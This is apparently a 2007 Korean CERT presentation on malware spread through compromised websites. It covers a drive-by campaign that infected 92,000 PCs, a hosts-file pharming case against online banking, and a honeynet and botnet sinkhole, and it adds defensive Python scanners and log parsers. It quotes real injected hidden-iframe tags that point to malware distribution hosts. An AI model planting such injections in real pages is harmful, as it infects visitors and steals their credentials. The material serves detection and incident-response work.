Current counter-measures and responses by CERTs




Jeong, Hyun Cheol (hcjung@kisa.or.kr), April 2007

Contents
I. Malware Trends in Korea
II. Malware from compromised Web sites
III. Case Study: Malware countermeasure
IV. KISC's HoneyNet / HoneyPot
V. Epilogue

I. Malware Trends in Korea

Infrastructure & on-line services in Korea
- Good network infrastructure: 1.4 Mil. 1st domain, 14 Mil. broadband subscribers, 27 Mil. PCs
  -> Used as an attack route: worm propagation, hosting phishing sites for foreign sites
- Good on-line services: on-line games ($630 Mil. in 2005), Internet banking service, on-line shopping malls
  -> Being an attack target: stealing on-line game ID/PW, phishing for Korean Internet banking, ransom DDoS

Malware in Korea
[Chart: threat level 2000-2006: CIH ('99), 2003.1.25 Slammer worm explosion; Virus, Worm, Mal. BOT, Phishing, Ad/Spyware]

II. Malware from compromised Websites

[Diagram: Internet users -> Mal. Code Injection on a compromised web site -> Re-direction to Mal. Code Site -> Mal. Code Download; KISA MC-Finder: Mal. Code Detect and Wipeout]

Injection techniques observed:
- Iframe (0x0) injection:
  <iframe src="http://web2.163.sh.cn/~mseweb/jz.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
- Injected in advertising Flash file:
  <embed src="images/intro.swf" quality="high" pluginspage="http://www.macromedia.com/go/getflashplayer" type="application/x-shockwave-flash" width="780" height="188"></embed></object></td>
- Injected using escape code sequence
- Injected in HTTP 404 error message
- Injected to database (Rem.)

MC-Finder: Malicious Code Finder
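The detection side of the slide, as an added example that is not KISA's MC-Finder: a small scanner that flags 0x0 iframes and embedded content loaded from a host other than the page's own, the two patterns shown above. The page host and the sample page are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


def _is_zero(value):
    """True for width/height attributes written as 0, "0" or "0px"."""
    if value is None:
        return False
    return value.strip().lower().removesuffix("px").strip() == "0"


class HiddenFrameFinder(HTMLParser):
    """Collects iframe/embed/object/script tags that are 0x0 or load from another host."""

    def __init__(self, page_host):
        super().__init__()
        self.page_host = page_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "embed", "object", "script"):
            return
        a = {k.lower(): (v or "") for k, v in attrs}
        src = a.get("src") or a.get("data") or ""
        src_host = urlparse(src).netloc.lower()
        reasons = []
        if tag == "iframe" and _is_zero(a.get("width")) and _is_zero(a.get("height")):
            reasons.append("0x0 iframe")
        if src_host and src_host != self.page_host:
            reasons.append("loads from " + src_host)
        if reasons:
            self.findings.append((tag, src, "; ".join(reasons)))


def scan_page(html, page_host):
    """Return [(tag, src, reason), ...] for suspicious embedded content."""
    finder = HiddenFrameFinder(page_host)
    finder.feed(html)
    return finder.findings


# Constructed page: the injected iframe from the slide plus benign same-site content
SAMPLE_PAGE = """<html><body>
<iframe src="http://web2.163.sh.cn/~mseweb/jz.htm" name="zhu" width="0" height="0" frameborder="0"></iframe>
<embed src="images/intro.swf" quality="high" type="application/x-shockwave-flash" width="780" height="188"></embed>
<script src="http://www.example.com/site.js"></script>
<iframe src="http://www.example.com/banner.htm" width="468" height="60"></iframe>
</body></html>"""
```

Run `scan_page(SAMPLE_PAGE, "www.example.com")`: only the injected iframe is reported, the relative Flash embed and same-host script and banner are not.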

III. Case Study: Malware Countermeasure
CASE 1: 92,000 PCs are infected from 1,000 compromised websites (Feb. 2007)

[Diagram: Foreign Attacker, 1,000 Transit sites, Malware Distribution site (http://xxx.com), Internet Users]
1. Websites hacking (1,000 Transit sites)
2. Insert the illegal iframe: <iframe src=http://xxx.com/img/jang/music.htm height=0 width=0></iframe>
3. Visit the victim sites
4. Link to the distribution site
5. Try attack to 620,000 IPs against MS06-014 Vul.
6. 92,000 PCs are infected
7. Online game ID/PW leaked
8. Enjoy game or make money?

III. Case Study: Malware Countermeasure
CASE 1: 92,000 PCs are infected from 1,000 compromised websites (Feb. 2007)

How To Detect
- Find a Transit site (Win2K) from MCFinder
- Find the Distribution site (FreeBSD) from the Transit site:
  <iframe src=http://xxx.com/img/jang/music.htm height=0 width=0></iframe>
- Find the other Transit sites (about 1,000 sites) from the Distribution site's referer log:
  [19/Dec/2006:17:24:26 +0900] "GET /img/jang/music.htm HTTP/1.1" 200 2115 "http://www.yyy.com/default.asp" "Mozilla/4.0

How To React
- Press release
- Notify and fix the Transit / Distribution sites
- Block some Distribution sites from outside of the border
  - Based on The Act on Promotion of Information & Communication Network Utilization and Information Protection, etc.
- Update MCFinder's detection pattern
- Collect & supply the malware related to this case to AV vendors

Learn from this Case
- Rapid reaction is very important
- The attacker is not one guy but an organized group
- We need international cooperation and information sharing
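The referer-log step of "How To Detect", as an added example (not KISA's tooling): parse a distribution site's access log for requests to the injected page and count the referring hosts, which is the transit-site list, plus the distinct client addresses that loaded it. The log lines are constructed in the shape of the one quoted on the slide; xxx.com/yyy.com style names are placeholders.

```python
import re
from collections import Counter
from urllib.parse import urlparse

# Combined-log-format line; the leading "client ident user" fields are optional
# because the slide's excerpt starts at the timestamp.
LOG_RE = re.compile(
    r'^(?:(?P<client>\S+) \S+ \S+ )?\[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<ua>[^"]*)'
)


def parse_hits(log_lines, malicious_path):
    """Yield parsed records for requests that fetched the injected page."""
    for line in log_lines:
        m = LOG_RE.match(line)
        if m and m.group("path") == malicious_path:
            yield m.groupdict()


def transit_sites(log_lines, malicious_path):
    """Map referring host -> number of visitors it sent to the distribution site."""
    hosts = Counter()
    for rec in parse_hits(log_lines, malicious_path):
        ref = rec["referer"]
        if ref in ("", "-"):
            continue  # direct requests carry no referer, so no transit site to learn
        hosts[urlparse(ref).netloc.lower()] += 1
    return dict(hosts)


def exposed_clients(log_lines, malicious_path):
    """Distinct client addresses that loaded the injected page (exposure estimate)."""
    return {rec["client"] for rec in parse_hits(log_lines, malicious_path) if rec["client"]}


# Constructed log excerpt (documentation address ranges, placeholder host names)
SAMPLE_LOG = """\
203.0.113.5 - - [19/Dec/2006:17:24:26 +0900] "GET /img/jang/music.htm HTTP/1.1" 200 2115 "http://www.yyy.com/default.asp" "Mozilla/4.0"
203.0.113.9 - - [19/Dec/2006:17:25:01 +0900] "GET /img/jang/music.htm HTTP/1.1" 200 2115 "http://www.zzz.co.kr/index.html" "Mozilla/4.0"
198.51.100.2 - - [19/Dec/2006:17:25:40 +0900] "GET /img/jang/music.htm HTTP/1.1" 200 2115 "http://www.yyy.com/board/list.asp" "Mozilla/4.0"
198.51.100.7 - - [19/Dec/2006:17:26:03 +0900] "GET /index.htm HTTP/1.1" 200 512 "-" "Mozilla/4.0"
""".splitlines()
```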

III. Case Study: Malware Countermeasure
CASE 2: Pharming with Web hacking (Jan. 2007)

[Diagram: Foreign Attacker, Malware Distribution site, malicious-code-infected website, Internet Users, Origin site, Forgery site]
1. Visit the malicious code infected website
2. Attack the visitor's PC (MS06-014)
3. Install malware & change the hosts file
4. Certificate file leaked
5. Change direction to the forgery banking site & input the financial information
6. Financial information leaked (account num., account PW, certificate PW, ...)

III. Case Study: Malware Countermeasure
CASE 2: Pharming with Web hacking (Jan. 2007)

How To Detect
- Reported from one bank: "There is a phishing site forging our bank."
- Request for remote assistance from one on-line banking user: "My PC is something wrong"
  - We can find the trojan for pharming

How To React
- Announce this incident and supply the list of victims' certificates to the CAs (KISA is the Root CA)
- The CAs revoke the victims' certificates
- Press release
- Collect & supply the malware related to this case to AV vendors

Learn from this Case
- Now, attackers are targeting not only game info but also Korean financial info
- We need a more secure on-line banking system: OTP, removable storage for certificates
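A defender-side check for the hosts-file pharming in Case 2, as an added example (not the bank's or KISA's tooling): parse a hosts file and report any entry that pins a protected banking name to a routable address. The protected domain list and the sample hosts file are constructed.

```python
import ipaddress

# Constructed list: names whose resolution must never come from a local hosts entry.
PROTECTED_DOMAINS = {"www.examplebank.co.kr", "banking.examplebank.co.kr"}


def parse_hosts(text):
    """Yield (address, hostname) pairs from hosts-file text, ignoring comments."""
    for raw in text.splitlines():
        line = raw.split("#", 1)[0].strip()
        if not line:
            continue
        parts = line.split()
        for name in parts[1:]:
            yield parts[0], name.lower()


def pharming_entries(text, protected=PROTECTED_DOMAINS):
    """Return (address, name, reason) for entries that redirect a protected name."""
    hits = []
    for ip, name in parse_hosts(text):
        if name not in protected:
            continue
        try:
            addr = ipaddress.ip_address(ip)
        except ValueError:
            hits.append((ip, name, "unparseable address"))
            continue
        if addr.is_loopback or addr.is_unspecified:
            # A loopback/unspecified entry blocks the site rather than redirecting it;
            # that is not the pharming pattern described here.
            continue
        hits.append((ip, name, "resolves locally to " + ip))
    return hits


# Constructed hosts file with two injected banking entries and benign lines
SAMPLE_HOSTS = """\
# Copyright (c) 1993-1999 Microsoft Corp.
127.0.0.1       localhost
203.0.113.77    www.examplebank.co.kr      # injected entry
203.0.113.77    banking.examplebank.co.kr
192.0.2.10      intranet.example.com
"""
```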

IV. KISC's HoneyNet / HoneyPot: Network Survival Time

[Screenshots: daily-based network survival time checking; detailed survival time; trends of survival time; risk of each malware]

IV. KISC's HoneyNet / HoneyPot: Network Survival Time

[Chart: Network Survival Time in minutes (0-60) by month (Jan-Dec) for '06 Windows XP SP1, '06 Windows 2000 SP4, '07 Windows XP SP1, '07 Windows 2000 SP4]

- Purpose: to check a system's survival time without any security patch and with no login password
- Testing location: Internet Exchanges (neutral point, no ISP's security policy involved)
- Similar to SANS's Survival Time

IV. KISC's HoneyNet / HoneyPot: BOTNet Sinkhole

[Diagram: BOTNet Sinkhole. Components: Zombie PCs, ISP DNS, Zombie C&C, Sinkhole, Control System. Flows: Zombie C&C DNS RR update, Zombie C&C resolution, Sinkhole IP notification, Sinkhole connection]
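The sinkhole flow in the diagram, as an added simulation that is not KISA's system: the control system pushes a DNS RR update for known C&C names to the ISP resolver, bots resolving those names are sent to the sinkhole, and the sinkhole inventories the connecting addresses for notification. All names and addresses are constructed.

```python
import ipaddress

SINKHOLE_IP = "192.0.2.53"  # constructed sinkhole address


class IspResolver:
    """ISP DNS with an override table pushed by the sinkhole control system."""

    def __init__(self, upstream):
        self.upstream = upstream  # name -> real answer (constructed stand-in for recursion)
        self.overrides = {}

    def update_rr(self, cc_names, sinkhole_ip):
        # "DNS RR Update": pin each known C&C name to the sinkhole address
        for name in cc_names:
            self.overrides[name.lower()] = sinkhole_ip

    def resolve(self, name):
        name = name.lower()
        return self.overrides.get(name) or self.upstream.get(name)


class Sinkhole:
    """Accepts the redirected bot traffic and records which clients showed up."""

    def __init__(self):
        self.zombies = {}  # cc_name -> set of client addresses

    def record_connection(self, src_ip, cc_name):
        ipaddress.ip_address(src_ip)  # reject garbage before storing it
        self.zombies.setdefault(cc_name.lower(), set()).add(src_ip)

    def notifications(self):
        # "Sinkhole IP notification": per-C&C list of infected clients to hand to ISPs
        return {name: sorted(ips) for name, ips in self.zombies.items()}


def simulate():
    """Run three lookups through the resolver and deliver sinkholed ones to the sinkhole."""
    resolver = IspResolver({"cc.example.net": "198.51.100.20", "www.example.com": "198.51.100.80"})
    sink = Sinkhole()
    resolver.update_rr(["cc.example.net"], SINKHOLE_IP)
    lookups = [("203.0.113.10", "cc.example.net"), ("203.0.113.11", "CC.example.net"),
               ("203.0.113.10", "www.example.com")]
    for src, host in lookups:
        if resolver.resolve(host) == SINKHOLE_IP:
            sink.record_connection(src, host)  # the bot's TCP connect lands on the sinkhole
    return resolver, sink
```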

V. Epilogue

Cyber attack becomes more and more criminal & organized
- We don't have jurisdiction over cross-border attacks
- Legal systems differ among the economies
- Need stronger international cyber law & cooperation

Malware becomes more and more sophisticated & sneaky
- Sometimes a zero-day vulnerability is exploited for a targeted attack
- Need information sharing of attack methods & patterns
- Need more proactive monitoring and response that does not depend on incident reporting

Compromised web sites are one of the major routes for malware propagation
- 69% of vulnerabilities are related to web applications (Symantec, 2006)
- Need to enhance web security and monitor malware distribution web sites (MCFinder is used in KrCERT/CC)

Thank you!!
http://www.krcert.or.kr
hcjung@kisa.or.kr